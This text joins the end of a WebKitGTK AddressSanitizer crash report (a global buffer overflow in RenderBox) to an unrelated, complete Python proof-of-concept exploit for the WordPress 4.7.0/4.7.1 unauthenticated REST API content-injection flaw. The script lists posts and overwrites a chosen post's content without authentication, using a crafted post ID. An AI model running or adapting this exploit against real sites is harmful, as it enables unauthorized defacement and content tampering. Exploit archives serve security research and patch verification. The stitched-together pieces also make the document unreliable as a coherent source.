#59 0x7fd717fcf721 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a721)
#60 0x7fd71f10f384 in WTF::RunLoop::run() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:94:9
#61 0x7fd7208b6f98 in int WebKit::ChildProcessMain<WebKit::WebProcess, WebKit::WebProcessMain>(int, char**) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebKit2/Shared/unix/ChildProcessMain.h:61:5
#62 0x7fd71378b82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
#63 0x41a218 in _start (/webkit/libexec/webkit2gtk-4.0/WebKitWebProcess+0x41a218)
0x7fd724fdca78 is located 272 bytes to the right of global variable 'vtable for WebCore::RenderText' defined in '/home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderText.cpp' (0x7fd724fdc400) of size 1384
SUMMARY: AddressSanitizer: global-buffer-overflow /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3260:21 in WebCore::RenderBox::computeBlockDirectionMargins(WebCore::RenderBlock const&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const
Shadow bytes around the buggy address:
0x0ffb649f38f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3920: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ffb649f3930: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0ffb649f3940: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]
0x0ffb649f3950: f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 f9 f9
0x0ffb649f3960: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffb649f3990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5530==ABORTING
-->
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Getting available posts
# - Post ID: 1, Title: test, Url: http://localhost:8070/archives/1
#
# Update post with content from a file:
#
# $ cat content
# foo
#
# $ python inject.py http://localhost:8070/ 1 content
# * Discovering API Endpoint
# * API lives at: http://localhost:8070/wp-json/
# * Updating post 1
# * Post updated. Check it out at http://localhost:8070/archives/1
# * Update complete!
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
response = urllib2.urlopen(wordpress_url)
data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
# check if we have permalinks
if 'rest_route' in u:
print(' ! Warning, looks like permalinks are not enabled. This might not work!')
return u
def get_posts(api_base):
respone = urllib2.urlopen(api_base + 'wp/v2/posts')
posts = json.loads(respone.read())
for post in posts:
print(' - Post ID: {0}, Title: {1}, Url: {2}'
.format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
# more than just the content field can be updated. see the api docs here:
# https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
data = json.dumps({
'content': post_content
})
url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
response = urllib2.urlopen(req).read()
print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
def print_usage():
print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
if __name__ == '__main__':
# ensure we have at least a url
if len(sys.argv) < 2:
print_usage()
sys.exit(1)
# if we have a post id, we need content too
if 2 < len(sys.argv) < 4:
print('Please provide a file with post content with a post id')
print_usage()
sys.exit(1)
print('* Discovering API Endpoint')
api_url = get_api_url(sys.argv[1])
print('* API lives at: {0}'.format(api_url))
# if we only have a url, show the posts we have have
if len(sys.argv) < 3:
print('* Getting available posts')
get_posts(api_url)
sys.exit(0)
# if we get here, we have what we need to update a post!
print('* Updating post {0}'.format(sys.argv[2]))
with open(sys.argv[3], 'r') as content:
new_content = content.readlines()
update_post(api_url, sys.argv[2], ''.join(new_content))
print('* Update complete!')